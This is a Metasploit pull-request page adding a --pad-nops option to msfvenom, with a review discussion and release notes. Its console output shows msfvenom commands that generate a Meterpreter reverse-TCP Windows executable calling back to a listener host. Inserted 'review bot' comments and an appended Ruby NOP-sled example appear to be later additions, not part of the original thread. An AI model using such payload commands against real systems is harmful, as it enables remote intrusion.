
#6100 : --pad-nops option for msfvenom #10872

Merged
merged 5 commits into from Nov 21, 2018

6 participants
@runt1me

runt1me commented Oct 26, 2018

Adds an option --pad-size <payload size> to msfvenom to prepend a NOP sled of appropriate length given total <payload size>.

Relevant issue: msfvenom - total payload space, fill with nops #6100

Verification

  • Run msfvenom with --pad-size option on the console (various use cases shown below)

Console Output

Correct usage, --pad-size larger than payload size

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 420 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Successfully added NOP sled of size 52 from x86/single_byte
Payload size: 420 bytes
Final size of exe file: 73802 bytes

--pad-size equal to payload size (no NOP sled added, but no errors thrown)

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 368 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes

--pad-size less than payload size but greater than zero (error is raised, no executable generated)

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 367 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Error: pad-size value 367 is less than payload size.

--pad-size less than or equal to zero - don't know why anyone would do this, but no NOP sled is added

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 0 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes

--pad-size and -n options are both given - generates an error

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --pad-size 420 -n 52 -p windows/meterpreter/reverse_tcp -a x86 --platform windows -b "\x00" LHOST=10.10.10.11 -f exe > ~/out.exe
Error: Option --pad-size and -n cannot be used together

7043mcgeep added some commits Oct 15, 2018

@runt1me


runt1me commented Oct 31, 2018

ping @FireFart @jvazquez-r7 @bcook-r7 - committers who commented on original issue

@bwatters-r7


Contributor

bwatters-r7 commented Nov 9, 2018

Makes sense to me....
It does not appear to break anything when not in use (at least on windows)..... I'll run some more tests using it to be sure.
image

@bwatters-r7 bwatters-r7 self-assigned this Nov 14, 2018

@busterb


Contributor

busterb commented Nov 20, 2018

Thanks, checking it out.

@@ -124,6 +130,7 @@ def initialize(opts={})
@iterations = opts.fetch(:iterations, 1)
@keep = opts.fetch(:keep, false)
@nops = opts.fetch(:nops, 0)
@padsize = opts.fetch(:padsize, 0)
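Review bot: `@padsize` is fetched with a default of 0 right beside `@nops`, but nothing in this hunk reconciles the two; the refusal to accept `--pad-size` together with `-n` shown in the console output must therefore live in the CLI parser, which leaves this class silently trusting that only one of them is non-zero. Since the thread later replaces `--pad-size` with a `--pad-nops` switch that reuses the `-n` value, this should become a boolean (e.g. `@padnops = opts.fetch(:padnops, false)`) rather than a second size, and the reworked commits should not leave an unused `@padsize` behind. This is also the line flagged for tab indentation: match the two-space indentation of the surrounding `opts.fetch` lines.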


@busterb

busterb Nov 20, 2018

Contributor

minor whitespace issue here, I can fix that. Just be sure to use spaces instead of tabs in the future


@7043mcgeep

7043mcgeep Nov 20, 2018

Contributor

Thanks, sorry about this. I'll be more careful in the future.

@@ -364,6 +371,9 @@ def generate_payload
encoded_payload = encode_payload(raw_payload)
end
encoded_payload = prepend_nops(encoded_payload)
if(@padsize > 0)
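Review bot: the `if(@padsize > 0)` branch runs after `prepend_nops`, so the size it pads up to already includes any `-n` sled; that is only correct because the CLI rejects `--pad-size` together with `-n`, a check this method cannot see. Folding both into one path, where a boolean changes how the `-n` count is interpreted before the sled is built (as proposed later in the thread), removes that hidden coupling and the extra error condition. Style: the surrounding Ruby uses `if @padsize > 0` without parentheses, and this line is tab-indented like the one above; convert to spaces.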


@busterb

busterb Nov 20, 2018

Contributor

same thing here. surprised msftidy didn't complain.

@busterb


Contributor

busterb commented Nov 20, 2018

Testing, I can fixup the whitespace nits noticed in the code, not a biggie.

@busterb


Contributor

busterb commented Nov 20, 2018

After playing with this more, I think it would be better if it was a switch that just puts the padding bytes on the front, rather than a mutually-exclusive number you specify instead of -n. That'll mean we don't have to handle an error condition either. I'll fix it up to work that way.

@7043mcgeep


Contributor

7043mcgeep commented Nov 21, 2018

> After playing with this more, I think it would be better if it was a switch that just puts the padding bytes on the front, rather than a mutually-exclusive number you specify instead of -n. That'll mean we don't have to handle an error condition either. I'll fix it up to work that way.

I don't quite understand. Currently pad-size takes a parameter which represents total desired payload size. If pad-size is a switch, how does venom know the amount of nop bytes to prepend?

@busterb


Contributor

busterb commented Nov 21, 2018

Sorry, I wasn't very clear. I was thinking more like this with a slightly modified flag:

msfvenom -n 1024 means prepend 1024 nop bytes (current behavior)
msfvenom -n 1024 --pad-nops means prepend nop bytes until the total size is 1024

That way we don't need the error check like "Option --pad-size and -n cannot be used together", the flag just makes it do the extra math accounting for the payload size. If that's confusing, we can keep this as-is.

@7043mcgeep


Contributor

7043mcgeep commented Nov 21, 2018

> Sorry, I wasn't very clear. I was thinking more like this with a slightly modified flag:
>
> msfvenom -n 1024 means prepend 1024 nop bytes (current behavior)
> msfvenom -n 1024 --pad-nops means prepend nop bytes until the total size is 1024
>
> That way we don't need the error check like "Option --pad-size and -n cannot be used together", the flag just makes it do the extra math accounting for the payload size. If that's confusing, we can keep this as-is.

Good idea. I like this approach much better, and it requires much less LOC. I used spaces instead of tabs this time :-)

@busterb busterb changed the title from #6100 : --pad-size option for msfvenom to #6100 : --pad-nops option for msfvenom Nov 21, 2018

@busterb


Contributor

busterb commented Nov 21, 2018

Great, thanks! Checking it out now.

@busterb busterb merged commit 30bf716 into rapid7:master Nov 21, 2018

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed

busterb added a commit that referenced this pull request Nov 21, 2018

msjenkins-r7 added a commit that referenced this pull request Nov 21, 2018

@busterb


Contributor

busterb commented Nov 21, 2018

Release Notes

This adds a --pad-nops option for msfvenom to pad a payload up to -n nops bytes. This is useful when replacing shellcode in an exploit with a fixed-length payload.
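The two modes busterb describes above (`-n N` prepends N NOP bytes; `-n N --pad-nops` pads up to a total of N bytes), as an added example that is not Metasploit code: a small Ruby function reproducing that arithmetic together with the edge cases from the PR's console output (a total equal to the payload size gives an empty sled, a smaller positive total raises, zero or negative is a no-op). It assumes a fixed single-byte 0x90 NOP instead of the `x86/single_byte` nop module, a constructed placeholder payload of 0xCC bytes rather than real shellcode, and a hypothetical `badchars` argument so the sled never reintroduces a byte the encoder was told to avoid (the PR runs with `-b "\x00"`).

```ruby
# Added example, not code from metasploit-framework. Reproduces the NOP-sled
# sizing logic discussed in the PR with a fixed 0x90 NOP (assumption: the real
# tool draws sled bytes from the x86/single_byte nop module).

class PadError < StandardError; end

# Prepend a NOP sled to +payload+ and return [sled, padded_payload].
#
#   pad_to_total: false -> +count+ is an absolute sled length   (msfvenom -n N)
#   pad_to_total: true  -> +count+ is the desired total size    (msfvenom -n N --pad-nops)
#
# Mirrors the behaviour shown in the PR's console output:
#   total == payload size -> empty sled, no error
#   0 < total < payload   -> PadError
#   total <= 0            -> no sled
def pad_with_nops(payload, count, pad_to_total: false, nop: "\x90".b, badchars: "".b)
  payload = payload.b
  # A sled must not undo the encoder's bad-character avoidance (-b "\x00" in the PR).
  if badchars.bytes.include?(nop.ord)
    raise PadError, format("NOP byte 0x%02x is in the bad-character list", nop.ord)
  end

  sled_len =
    if pad_to_total
      if count > 0 && count < payload.bytesize
        raise PadError, "pad-nops value #{count} is less than payload size #{payload.bytesize}."
      end
      [count - payload.bytesize, 0].max
    else
      [count, 0].max
    end

  sled = nop * sled_len
  [sled, sled + payload]
end

# Constructed stand-in for the 368-byte encoded payload from the PR output
# (0xCC bytes, not real shellcode).
FAKE_PAYLOAD = ("\xCC".b * 368).freeze

if __FILE__ == $PROGRAM_NAME
  sled, out = pad_with_nops(FAKE_PAYLOAD, 420, pad_to_total: true, badchars: "\x00".b)
  puts "Successfully added NOP sled of size #{sled.bytesize}"   # 52
  puts "Payload size: #{out.bytesize} bytes"                     # 420
end
```

Running the demo reproduces the 368 + 52 = 420 case from the PR description. The real tool differs in two ways worth remembering: the `x86/single_byte` module emits a mix of single-byte instructions rather than a run of 0x90, and the sled is built only after encoding, which is why a too-small total can only be reported once the encoded size is known.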

@busterb


Contributor

busterb commented Nov 21, 2018

Thanks @runt1me !

@7043mcgeep 7043mcgeep referenced this pull request Nov 26, 2018

Open

#6637: Adds msfvenom option --sec-name #10892
